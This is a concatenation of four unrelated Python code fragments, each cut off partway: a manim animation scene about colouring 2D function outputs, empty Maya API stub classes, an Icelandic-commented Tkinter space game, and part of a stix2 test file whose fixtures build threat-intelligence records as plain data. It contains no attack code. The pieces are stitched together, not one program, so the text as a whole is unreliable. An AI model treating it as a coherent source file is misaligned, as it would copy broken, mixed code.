dot.move_to(plane.coords_to_point(1, 1))
dot.save_state()
dot.fade(1)
dot.center()
question = TextMobject(
"Wait...what would \\\\ positive and negative \\\\ be in 2d?",
)
# question.set_color_by_tex_to_color_map({
# "+" : "green",
# "textminus" : "red"
# })
self.student_says(
question,
target_mode = "sassy",
student_index = 2,
added_anims = [
self.teacher.change, "plain",
],
bubble_kwargs = {"direction" : LEFT},
run_time = 1,
)
self.play(
Write(plane, run_time = 1),
self.students[0].change, "confused",
self.students[1].change, "confused",
)
self.play(dot.restore)
for coords in (-1, 1), (1, -1), (0, -2), (-2, 1):
self.wait(0.5)
self.play(dot.move_to, plane.coords_to_point(*coords))
self.wait()
class HypothesisAboutFullyColoredBoundary(ColorMappedObjectsScene):
CONFIG = {
"func" : plane_func_from_complex_func(lambda z : z**3),
}
def construct(self):
ColorMappedObjectsScene.construct(self)
square = Square(side_length = 4)
square.color_using_background_image(self.background_image_file)
hypothesis = TextMobject(
"Working Hypothesis: \\\\",
"If a 2d function hits outputs of all possible colors \\\\" +
"on the boundary of a 2d region,",
"that region \\\\ contains a zero.",
alignment = "",
)
hypothesis[0].next_to(hypothesis[1:], UP)
hypothesis[0].set_color(YELLOW)
s = hypothesis[1].get_tex_string()
s = [c for c in s if c not in string.whitespace]
n = s.index("colors")
hypothesis[1][n:n+len("colors")].set_color_by_gradient(
| |
isZero(*args, **kwargs):
pass
def reorder(*args, **kwargs):
pass
def reorderIt(*args, **kwargs):
pass
def setToAlternateSolution(*args, **kwargs):
pass
def setToClosestCut(*args, **kwargs):
pass
def setToClosestSolution(*args, **kwargs):
pass
def setValue(*args, **kwargs):
pass
def decompose(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
order = None
thisown = None
x = None
y = None
z = None
__swig_destroy__ = None
identity = None
kXYZ = 0
kXZY = 3
kYXZ = 4
kYZX = 1
kZXY = 2
kZYX = 5
class MURI(_object):
def __eq__(*args, **kwargs):
pass
def __init__(self, *args):
pass
def __ne__(*args, **kwargs):
pass
def __repr__(self):
pass
def addQueryItem(*args, **kwargs):
pass
def asString(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def clear(*args, **kwargs):
pass
def copy(*args, **kwargs):
pass
def getAllQueryItemKeys(*args, **kwargs):
pass
def getAllQueryItemValues(*args, **kwargs):
pass
def getAuthority(*args, **kwargs):
pass
def getDirectory(*args, **kwargs):
pass
def getFileName(*args, **kwargs):
pass
def getFragment(*args, **kwargs):
pass
def getHost(*args, **kwargs):
pass
def getPassword(*args, **kwargs):
pass
def getPath(*args, **kwargs):
pass
def getPort(*args, **kwargs):
pass
def getQueryItemValue(*args, **kwargs):
pass
def getQueryPairDelimiter(*args, **kwargs):
pass
def getQueryValueDelimiter(*args, **kwargs):
pass
def getScheme(*args, **kwargs):
pass
def getUserInfo(*args, **kwargs):
pass
def getUserName(*args, **kwargs):
pass
def isEmpty(*args, **kwargs):
pass
def isValid(*args, **kwargs):
pass
def removeAllQueryItems(*args, **kwargs):
pass
def removeQueryItem(*args, **kwargs):
pass
def setAuthority(*args, **kwargs):
pass
def setDirectory(*args, **kwargs):
pass
def setFileName(*args, **kwargs):
pass
def setFragment(*args, **kwargs):
pass
def setHost(*args, **kwargs):
pass
def setPassword(*args, **kwargs):
pass
def setPath(*args, **kwargs):
pass
def setPort(*args, **kwargs):
pass
def setQueryDelimiters(*args, **kwargs):
pass
def setScheme(*args, **kwargs):
pass
def setURI(*args, **kwargs):
pass
def setUserInfo(*args, **kwargs):
pass
def setUserName(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
def isValidURI(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class array2dFloat(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def get(*args, **kwargs):
pass
def getptr(*args, **kwargs):
pass
def set(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MWeight(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def assign(*args, **kwargs):
pass
def influence(*args, **kwargs):
pass
def seam(*args, **kwargs):
pass
def setInfluence(*args, **kwargs):
pass
def setSeam(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MItSubdEdge(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def index(*args, **kwargs):
pass
def isBoundary(*args, **kwargs):
pass
def isDone(*args, **kwargs):
pass
def isSharp(*args, **kwargs):
pass
def isValid(*args, **kwargs):
pass
def level(*args, **kwargs):
pass
def next(*args, **kwargs):
pass
def reset(*args, **kwargs):
pass
def setLevel(*args, **kwargs):
pass
def setSharpness(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MCacheFormatDescription(_object):
def __init__(self, *args, **kwargs):
pass
def __repr__(self):
pass
def addChannel(*args, **kwargs):
pass
def addDescriptionInfo(*args, **kwargs):
pass
def getChannelDataType(*args, **kwargs):
pass
def getChannelEndTime(*args, **kwargs):
pass
def getChannelInterpretation(*args, **kwargs):
pass
def getChannelName(*args, **kwargs):
pass
def getChannelSamplingRate(*args, **kwargs):
pass
def getChannelSamplingType(*args, **kwargs):
pass
def getChannelStartTime(*args, **kwargs):
pass
def getDescriptionInfo(*args, **kwargs):
pass
def getDistribution(*args, **kwargs):
pass
def getNumChannels(*args, **kwargs):
pass
def getStartAndEndTimes(*args, **kwargs):
pass
def getTimePerFrame(*args, **kwargs):
pass
def setDistribution(*args, **kwargs):
pass
def setTimePerFrame(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
kDouble = 1
kDoubleArray = 2
kDoubleVectorArray = 3
kFloatArray = 5
kFloatVectorArray = 6
kInt32Array = 4
kIrregular = 1
kNoFile = 0
kOneFile = 1
kOneFilePerFrame = 2
kRegular = 0
kUnknownData = 0
class MArgList(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def addArg(*args, **kwargs):
pass
def asAngle(*args, **kwargs):
pass
def asBool(*args, **kwargs):
pass
def asDistance(*args, **kwargs):
pass
def asDouble(*args, **kwargs):
pass
def asDoubleArray(*args, **kwargs):
pass
def asInt(*args, **kwargs):
pass
def asIntArray(*args, **kwargs):
pass
def asMatrix(*args, **kwargs):
pass
def asPoint(*args, **kwargs):
pass
def asString(*args, **kwargs):
pass
def asStringArray(*args, **kwargs):
pass
def asTime(*args, **kwargs):
pass
def asVector(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def flagIndex(*args, **kwargs):
pass
def length(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
kInvalidArgIndex = 4294967295
class MTimeArray(_object):
def __getitem__(*args, **kwargs):
pass
def __init__(self, *args):
pass
def __repr__(self):
pass
def append(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def clear(*args, **kwargs):
pass
def copy(*args, **kwargs):
pass
def insert(*args, **kwargs):
pass
def length(*args, **kwargs):
pass
def remove(*args, **kwargs):
pass
def set(*args, **kwargs):
pass
def setLength(*args, **kwargs):
pass
def setSizeIncrement(*args, **kwargs):
pass
def sizeIncrement(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MQuaternion(_object):
def __add__(*args, **kwargs):
pass
def __eq__(*args, **kwargs):
pass
def __getitem__(*args, **kwargs):
pass
def __imul__(*args, **kwargs):
pass
def __init__(self, *args):
pass
def __iter__(self):
"""
Iterates on all components of a Maya api Quaternion
"""
pass
def __len__(self):
"""
Number of components in the Maya api Quaternion, ie 4
"""
pass
def __mul__(*args, **kwargs):
pass
def __ne__(*args, **kwargs):
pass
def __neg__(*args, **kwargs):
pass
def __repr__(self):
pass
def __sub__(*args, **kwargs):
pass
def asEulerRotation(*args, **kwargs):
pass
def asMatrix(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def conjugate(*args, **kwargs):
pass
def conjugateIt(*args, **kwargs):
pass
def exp(*args, **kwargs):
pass
def get(*args, **kwargs):
pass
def getAxisAngle(*args, **kwargs):
pass
def inverse(*args, **kwargs):
pass
def invertIt(*args, **kwargs):
pass
def isEquivalent(*args, **kwargs):
pass
def log(*args, **kwargs):
pass
def negateIt(*args, **kwargs):
pass
def normal(*args, **kwargs):
pass
def normalizeIt(*args, **kwargs):
pass
def scaleIt(*args, **kwargs):
pass
def setAxisAngle(*args, **kwargs):
pass
def setToXAxis(*args, **kwargs):
pass
def setToYAxis(*args, **kwargs):
pass
def setToZAxis(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
w = None
x = None
y = None
z = None
__swig_destroy__ = None
identity = None
class MItSubdFace(_object):
def __init__(self, *args):
pass
| |
if Sy < round(0 + 400 * math.sin(tel)) and Sx > round(1200 + 400 * math.cos(tel)): # 1200, 0
inn = True
if Sy < round(0 + 300 * math.sin(tel)) and Sx > round(1200 + 300 * math.cos(tel)):
dod = True
break
tel = round(tel + 0.01, 2)
elif room == "R4":
tel = 0
for a in range(628):
if Sy < round(0 + 400 * math.sin(tel)) and Sx < round(0 + 400 * math.cos(tel)): # 0, 0
inn = True
if Sy < round(0 + 300 * math.sin(tel)) and Sx < round(0 + 300 * math.cos(tel)):
dod = True
break
tel = round(tel + 0.01, 2)
if inn == True:
if dod == True:
for a in sol:
canvas.delete(a)
destroy(15)
elif dod == False:
sol.append(canvas.create_text(wW / 2, wH / 2, text="Heat Warning!", fill="white"))
if room == "sR1" or room == "sR2" or room == "sR3":
homeSS()
else:
homeS()
#Fall fyrir ef þú ert bensínlaus
def emty():
global dod
global sol
dod = True
canvas.bind("<Key>", dead)
for a in sol:
canvas.delete(a)
user()
canvas.create_text(wW / 2, wH / 2, text="Ship is out of fuel!", fill="white")
canvas.create_rectangle((wW / 2) - 50, (wH / 2) + 10, (wW / 2) + 50, (wH / 2) + 50, fill="grey")
canvas.create_text(wW / 2, (wH / 2) + 30, text="Restart", fill="white", anchor="center")
# Dautt fall(bara svo að þegar þú ert dauður getur ekki haldið áfram)
def dead(key):
pass
# Þegar þú deyrð
def destroy(boom):
global canvas
global listi
global sol
global wW
global wH
canvas.create_circle(Sx, Sy, boom, fill="orange")
for a in listi:
canvas.delete(a)
canvas.bind("<Key>", dead)
user()
canvas.create_text(wW / 2, wH / 2, text="Ship destroyed!", fill="white")
canvas.create_rectangle((wW / 2) - 50, (wH / 2) + 10, (wW / 2) + 50, (wH / 2) + 50, fill="grey")
canvas.create_text(wW / 2, (wH / 2) + 30, text="Restart", fill="white", anchor="center")
def user():
global wW
global wH
global e1
e1 = Entry(canvas)
canvas.create_text(wW / 2, (wH / 2) + 60, text="Sláðu inn notenda nafn þitt", fill="white")
canvas.create_window(wW / 2, (wH / 2) + 80, window=e1)
# Ef það er ýtt á músa takkann
def callback(event):
global canvas
global dod
global tel
global e1
canvas.focus_set()
print("clicked at", event.x, event.y)
if dod == True:
if event.x > (wW / 2) - 50 and event.y > (wH / 2) + 10 and event.x < (wW / 2) + 50 and event.y < (wH / 2) + 50:
nafn = e1.get()
if nafn != "":
entry = ","+nafn+":"+str(tel)
with open("scores.txt","a") as f:
f.write(entry)
reset()
# Til að búa til punkt
def new_dot():
global canvas
global speed
global dot
global tel
tel += 1
global Dx
global Dy
global Dr
global rooms
global room
global dtel
Dx = random.randint(0, 1200)
Dy = random.randint(0, 900)
Dr = random.choice(rooms)
tel1 = 0
for a in range(628):
if Dr == "R1":
print("Y:", Dy)
print("X:", Dx)
print("Ry:", round(900 + 300 * math.sin(tel)))
print("Rx:", round(1200 + 300 * math.cos(tel)))
if Dy > round(900 + 300 * math.sin(tel1)) and Dx > round(1200 + 300 * math.cos(tel1)):
print("yay!!")
new_dot()
elif Dr == "R2":
if Dy > round(900 + 300 * math.sin(tel1)) and Dx < round(0 + 300 * math.cos(tel1)):
new_dot()
elif Dr == "R3":
if Dy < round(0 + 300 * math.sin(tel1)) and Dx > round(1200 + 300 * math.cos(tel1)):
new_dot()
elif Dr == "R4":
if Dy < round(0 + 300 * math.sin(tel1)) and Dx < round(0 + 300 * math.cos(tel1)):
new_dot()
tel1 = round(tel1 + 0.01, 2)
# print(tel)
# Aðal skjár í geimskipi
def homeSS():
global canvas
global dot
global Cx
global Cy
global listi
canvas.delete(dot)
listi = []
listi.append(canvas.create_circle(Cx, Cy, 50, fill="white", outline=""))
# Aðal skjár í geimnum
def homeS():
global canvas
global dot
canvas.delete(dot)
global Sx
global Sy
global listi
listi = []
global fY
global room
global Dr
global dod
global maxfuel
global fuel
global wW
global wH
if room == Dr:
dot = canvas.create_circle(Dx, Dy, 3, fill="yellow")
try:
with open("scores.txt","r") as f:
text = f.read()
users = text.split(",")
telja = 0
for a in users:
nota = a.split(":")
if int(nota[1]) > int(telja):
nafn = nota[0]
telja = nota[1]
listi.append(canvas.create_text(wW/2,0,text="Hæsti notandi: "+nafn+" : "+str(telja),fill ="white",anchor = N))
except:
listi.append(
canvas.create_text(wW / 2, 0, text="Hæsti notandi: Enginn", fill="white",anchor=N))
if dod == False:
if fY == "s":
listi.append(canvas.create_circle(Sx, Sy - 8, 3, fill="lightblue", outline=""))
elif fY == "w":
listi.append(canvas.create_circle(Sx, Sy + 2, 3, fill="lightblue", outline=""))
elif fY == "a":
listi.append(canvas.create_circle(Sx + 2, Sy, 3, fill="lightblue", outline=""))
elif fY == "d":
listi.append(canvas.create_circle(Sx - 8, Sy, 3, fill="lightblue", outline=""))
if fY == "s" or fY == "w":
listi.append(canvas.create_circle(Sx, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx, Sy - 2, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx, Sy - 4, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx, Sy - 6, 3, fill="grey", outline=""))
elif fY == "a" or fY == "d":
listi.append(canvas.create_circle(Sx, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx - 2, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx - 4, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx - 6, Sy, 3, fill="grey", outline=""))
if Sx - 3 <= Dx + 3 and Sx + 3 >= Dx - 3 and Sy - 3 <= Dy + 3 and Sy + 3 >= Dy - 3 and room == Dr:
fuel = fuel + 10
if fuel > maxfuel:
fuel = maxfuel
new_dot()
if fuel == 0:
emty()
listi.append(canvas.create_text(wW - 10, 10, text="Stig: " + str(tel), width=100, anchor=NE, fill="white"))
listi.append(canvas.create_text(0 + 10, 10, text="Fuel: " + str(fuel), width=100, anchor=NW, fill="white"))
# Til að búa til stjörnur
def stars(numb, x1, y1, x2, y2):
global canvas
for a in range(numb):
x = random.randint(x1, x2)
y = random.randint(y1, y2)
star.append(canvas.create_circle(x, y, 1, fill="white", outline=""))
# Herbergi 1 í geimnum
def R1():
global canvas
global dot
global room
room = "R1"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(100, 120, 50, fill="blue", outline="lightblue", width=4))
planets.append(canvas.create_circle_arc(100, 120, 48, fill="green", outline="", start=45, end=140))
planets.append(canvas.create_circle_arc(100, 120, 48, fill="green", outline="", start=275, end=305))
planets.append(canvas.create_circle_arc(100, 120, 45, style="arc", outline="white", width=6, start=270 - 25,
end=270 + 25))
planets.append(canvas.create_circle(150, 40, 20, fill="#BBB", outline=""))
planets.append(canvas.create_circle(140, 40, 2, fill="darkgrey", outline=""))
planets.append(canvas.create_circle(160, 50, 4, fill="darkgrey", outline=""))
planets.append(canvas.create_circle(160, 30, 3, fill="darkgrey", outline=""))
planets.append(canvas.create_circle(1200, 900, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(1200, 900, 400, outline="#FF5C00"))
# Herbergi 2 í geimnum
def R2():
global canvas
global dot
global room
room = "R2"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(0, 900, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(0, 900, 400, outline="#FF5C00"))
planets.append(canvas.create_circle(900, 500, 45, fill="red"))
planets.append(canvas.create_circle(880, 520, 10, fill="#E82A00", outline=""))
planets.append(canvas.create_circle(920, 520, 8, fill="#E82A00", outline=""))
planets.append(canvas.create_circle(900, 480, 5, fill="#E82A00", outline=""))
planets.append(canvas.create_circle(500, 100, 60, fill="#FFA30B", outline="#FFBD05", width=4))
# Herbergi 3 í geimnum
def R3():
global canvas
global dot
global room
room = "R3"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(1200, 0, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(1200, 0, 400, outline="#FF5C00"))
# Herbergi 4 í geimnum
def R4():
global canvas
global dot
global room
room = "R4"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(0, 0, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(0, 0, 400, outline="#FF5C00"))
planets.append(canvas.create_circle(900, 600, 150, fill="#FFA700"))
planets.append(canvas.create_circle(900, 600, 225, outline="#FFE100", width=40))
# Herbergi 1 í geimskipi
def sR1():
global canvas
global dot
global wW
global wH
global Seatx
global Seaty
global room
room = "sR1"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_rectangle(0, 200, (wW / 4) * 3, 700, fill="darkgrey"))
planets.append(canvas.create_polygon(900, 200, wW, wH / 2, 900, 700, fill="darkgrey"))
planets.append(
canvas.create_rectangle(Seatx - 50, Seaty - 50, Seatx + 50, Seaty + 50, fill="brown", outline=""))
# Herbergi 2 í geimskipi
def sR2():
global canvas
global wW
global wH
global room
room = "sR2"
for a in planets:
canvas.delete(a)
planets.append(canvas.create_rectangle(0, 200, wW, 700, fill="darkgrey"))
# Herbergi 3 í geimskipi
def sR3():
global canvas
global wW
global wH
global room
room = "sR3"
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(300, wH / 2, 250, fill="lightblue", outline=""))
planets.append(canvas.create_rectangle(300, 200, wW, 700, fill="darkgrey", outline=""))
root = Tk()
reset()
root.mainloop()
#Fall sem heldur utan um skæri, blað, steinn
def sbs():
global tel1
global tel2
global tel3
tel1 = 0
tel2 = 0
tel3 = 0
for a in root.winfo_children():
| |
<filename>stix2/test/v21/test_environment.py
import os
import pytest
import stix2
import stix2.environment
import stix2.equivalence.graph
import stix2.equivalence.object
import stix2.exceptions
from .constants import (
ATTACK_PATTERN_ID, ATTACK_PATTERN_KWARGS, CAMPAIGN_ID, CAMPAIGN_KWARGS,
FAKE_TIME, IDENTITY_ID, IDENTITY_KWARGS, INDICATOR_ID, INDICATOR_KWARGS,
LOCATION_ID, LOCATION_KWARGS, MALWARE_ID, MALWARE_KWARGS, RELATIONSHIP_IDS,
REPORT_ID, REPORT_KWARGS, THREAT_ACTOR_ID, THREAT_ACTOR_KWARGS, TOOL_ID,
TOOL_KWARGS, VULNERABILITY_ID, VULNERABILITY_KWARGS,
)
FS_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "stix2_data")
@pytest.fixture
def ds():
cam = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
idy = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
ind = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
mal = stix2.v21.Malware(id=MALWARE_ID, **MALWARE_KWARGS)
rel1 = stix2.v21.Relationship(ind, 'indicates', mal, id=RELATIONSHIP_IDS[0])
rel2 = stix2.v21.Relationship(mal, 'targets', idy, id=RELATIONSHIP_IDS[1])
rel3 = stix2.v21.Relationship(cam, 'uses', mal, id=RELATIONSHIP_IDS[2])
reprt = stix2.v21.Report(
name="Malware Report", published="2021-05-09T08:22:22Z",
object_refs=[mal.id, rel1.id, ind.id],
)
stix_objs = [cam, idy, ind, mal, rel1, rel2, rel3, reprt]
yield stix2.MemoryStore(stix_objs)
@pytest.fixture
def ds2():
cam = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
idy = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
ind = stix2.v21.Indicator(id=INDICATOR_ID, created_by_ref=idy.id, **INDICATOR_KWARGS)
indv2 = ind.new_version(
external_references=[
{
"source_name": "unknown",
"url": "https://examplewebsite.com/",
},
],
object_marking_refs=[stix2.v21.TLP_WHITE],
)
mal = stix2.v21.Malware(id=MALWARE_ID, created_by_ref=idy.id, **MALWARE_KWARGS)
malv2 = mal.new_version(
external_references=[
{
"source_name": "unknown",
"url": "https://examplewebsite2.com/",
},
],
)
rel1 = stix2.v21.Relationship(ind, 'indicates', mal, id=RELATIONSHIP_IDS[0])
rel2 = stix2.v21.Relationship(mal, 'targets', idy, id=RELATIONSHIP_IDS[1])
rel3 = stix2.v21.Relationship(cam, 'uses', mal, id=RELATIONSHIP_IDS[2])
stix_objs = [cam, idy, ind, indv2, mal, malv2, rel1, rel2, rel3]
reprt = stix2.v21.Report(
created_by_ref=idy.id, name="example",
published="2021-04-09T08:22:22Z", object_refs=stix_objs,
)
stix_objs.append(reprt)
yield stix2.MemoryStore(stix_objs)
def test_object_factory_created_by_ref_str():
factory = stix2.ObjectFactory(created_by_ref=IDENTITY_ID)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.created_by_ref == IDENTITY_ID
def test_object_factory_created_by_ref_obj():
id_obj = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=id_obj)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.created_by_ref == IDENTITY_ID
def test_object_factory_override_default():
factory = stix2.ObjectFactory(created_by_ref=IDENTITY_ID)
new_id = "identity--983b3172-44fe-4a80-8091-eb8098841fe8"
ind = factory.create(stix2.v21.Indicator, created_by_ref=new_id, **INDICATOR_KWARGS)
assert ind.created_by_ref == new_id
def test_object_factory_created():
factory = stix2.ObjectFactory(created=FAKE_TIME)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.created == FAKE_TIME
assert ind.modified == FAKE_TIME
def test_object_factory_external_reference():
ext_ref = stix2.v21.ExternalReference(
source_name="ACME Threat Intel",
description="Threat report",
)
factory = stix2.ObjectFactory(external_references=ext_ref)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.external_references[0].source_name == "ACME Threat Intel"
assert ind.external_references[0].description == "Threat report"
ind2 = factory.create(stix2.v21.Indicator, external_references=None, **INDICATOR_KWARGS)
assert 'external_references' not in ind2
def test_object_factory_obj_markings():
stmt_marking = stix2.v21.StatementMarking("Copyright 2016, Example Corp")
mark_def = stix2.v21.MarkingDefinition(
definition_type="statement",
definition=stmt_marking,
)
factory = stix2.ObjectFactory(object_marking_refs=[mark_def, stix2.v21.TLP_AMBER])
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert mark_def.id in ind.object_marking_refs
assert stix2.v21.TLP_AMBER.id in ind.object_marking_refs
factory = stix2.ObjectFactory(object_marking_refs=stix2.v21.TLP_RED)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert stix2.v21.TLP_RED.id in ind.object_marking_refs
def test_object_factory_list_append():
ext_ref = stix2.v21.ExternalReference(
source_name="ACME Threat Intel",
description="Threat report from ACME",
)
ext_ref2 = stix2.v21.ExternalReference(
source_name="Yet Another Threat Report",
description="Threat report from YATR",
)
ext_ref3 = stix2.v21.ExternalReference(
source_name="Threat Report #3",
description="One more threat report",
)
factory = stix2.ObjectFactory(external_references=ext_ref)
ind = factory.create(stix2.v21.Indicator, external_references=ext_ref2, **INDICATOR_KWARGS)
assert ind.external_references[1].source_name == "Yet Another Threat Report"
ind = factory.create(stix2.v21.Indicator, external_references=[ext_ref2, ext_ref3], **INDICATOR_KWARGS)
assert ind.external_references[2].source_name == "Threat Report #3"
def test_object_factory_list_replace():
ext_ref = stix2.v21.ExternalReference(
source_name="ACME Threat Intel",
description="Threat report from ACME",
)
ext_ref2 = stix2.v21.ExternalReference(
source_name="Yet Another Threat Report",
description="Threat report from YATR",
)
factory = stix2.ObjectFactory(external_references=ext_ref, list_append=False)
ind = factory.create(stix2.v21.Indicator, external_references=ext_ref2, **INDICATOR_KWARGS)
assert len(ind.external_references) == 1
assert ind.external_references[0].source_name == "Yet Another Threat Report"
def test_environment_functions():
env = stix2.Environment(
stix2.ObjectFactory(created_by_ref=IDENTITY_ID),
stix2.MemoryStore(),
)
# Create a STIX object
ind = env.create(stix2.v21.Indicator, id=INDICATOR_ID, **INDICATOR_KWARGS)
assert ind.created_by_ref == IDENTITY_ID
# Add objects to datastore
ind2 = ind.new_version(labels=['benign'])
env.add([ind, ind2])
# Get both versions of the object
resp = env.all_versions(INDICATOR_ID)
assert len(resp) == 2
# Get just the most recent version of the object
resp = env.get(INDICATOR_ID)
assert resp['labels'][0] == 'benign'
# Search on something other than id
query = [stix2.Filter('type', '=', 'vulnerability')]
resp = env.query(query)
assert len(resp) == 0
# See different results after adding filters to the environment
env.add_filters([
stix2.Filter('type', '=', 'indicator'),
stix2.Filter('created_by_ref', '=', IDENTITY_ID),
])
env.add_filter(stix2.Filter('labels', '=', 'benign')) # should be 'malicious-activity'
resp = env.get(INDICATOR_ID)
assert resp['labels'][0] == 'benign' # should be 'malicious-activity'
def test_environment_source_and_sink():
ind = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
env = stix2.Environment(source=stix2.MemorySource([ind]), sink=stix2.MemorySink([ind]))
assert env.get(INDICATOR_ID).indicator_types[0] == 'malicious-activity'
def test_environment_datastore_and_sink():
with pytest.raises(ValueError) as excinfo:
stix2.Environment(
factory=stix2.ObjectFactory(),
store=stix2.MemoryStore(), sink=stix2.MemorySink,
)
assert 'Data store already provided' in str(excinfo.value)
def test_environment_no_datastore():
env = stix2.Environment(factory=stix2.ObjectFactory())
with pytest.raises(AttributeError) as excinfo:
env.add(stix2.v21.Indicator(**INDICATOR_KWARGS))
assert 'Environment has no data sink to put objects in' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.get(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.all_versions(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.query(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.relationships(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
with pytest.raises(AttributeError) as excinfo:
env.related_to(INDICATOR_ID)
assert 'Environment has no data source' in str(excinfo.value)
def test_environment_add_filters():
env = stix2.Environment(factory=stix2.ObjectFactory())
env.add_filters([INDICATOR_ID])
env.add_filter(INDICATOR_ID)
def test_environment_datastore_and_no_object_factory():
# Uses a default object factory
env = stix2.Environment(store=stix2.MemoryStore())
ind = env.create(stix2.v21.Indicator, id=INDICATOR_ID, **INDICATOR_KWARGS)
assert ind.id == INDICATOR_ID
def test_parse_malware():
env = stix2.Environment()
data = """{
"type": "malware",
"spec_version": "2.1",
"id": "malware--9c4638ec-f1de-4ddb-abf4-1b760417654e",
"created": "2017-01-01T12:34:56.000Z",
"modified": "2017-01-01T12:34:56.000Z",
"name": "Cryptolocker",
"malware_types": [
"ransomware"
],
"is_family": false
}"""
mal = env.parse(data, version="2.1")
assert mal.type == 'malware'
assert mal.spec_version == '2.1'
assert mal.id == MALWARE_ID
assert mal.created == FAKE_TIME
assert mal.modified == FAKE_TIME
assert mal.malware_types == ['ransomware']
assert mal.name == "Cryptolocker"
assert not mal.is_family
def test_creator_of():
identity = stix2.v21.Identity(**IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=identity.id)
env = stix2.Environment(store=stix2.MemoryStore(), factory=factory)
env.add(identity)
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
creator = env.creator_of(ind)
assert creator is identity
def test_creator_of_no_datasource():
identity = stix2.v21.Identity(**IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=identity.id)
env = stix2.Environment(factory=factory)
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
with pytest.raises(AttributeError) as excinfo:
env.creator_of(ind)
assert 'Environment has no data source' in str(excinfo.value)
def test_creator_of_not_found():
identity = stix2.v21.Identity(**IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=identity.id)
env = stix2.Environment(store=stix2.MemoryStore(), factory=factory)
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
creator = env.creator_of(ind)
assert creator is None
def test_creator_of_no_created_by_ref():
env = stix2.Environment(store=stix2.MemoryStore())
ind = env.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
creator = env.creator_of(ind)
assert creator is None
def test_relationships(ds):
env = stix2.Environment(store=ds)
mal = env.get(MALWARE_ID)
resp = env.relationships(mal)
assert len(resp) == 3
assert any(x['id'] == RELATIONSHIP_IDS[0] for x in resp)
assert any(x['id'] == RELATIONSHIP_IDS[1] for x in resp)
assert any(x['id'] == RELATIONSHIP_IDS[2] for x in resp)
def test_relationships_no_id(ds):
env = stix2.Environment(store=ds)
mal = {
"type": "malware",
"name": "some variant",
}
with pytest.raises(ValueError) as excinfo:
env.relationships(mal)
assert "object has no 'id' property" in str(excinfo.value)
def test_relationships_by_type(ds):
env = stix2.Environment(store=ds)
mal = env.get(MALWARE_ID)
resp = env.relationships(mal, relationship_type='indicates')
assert len(resp) == 1
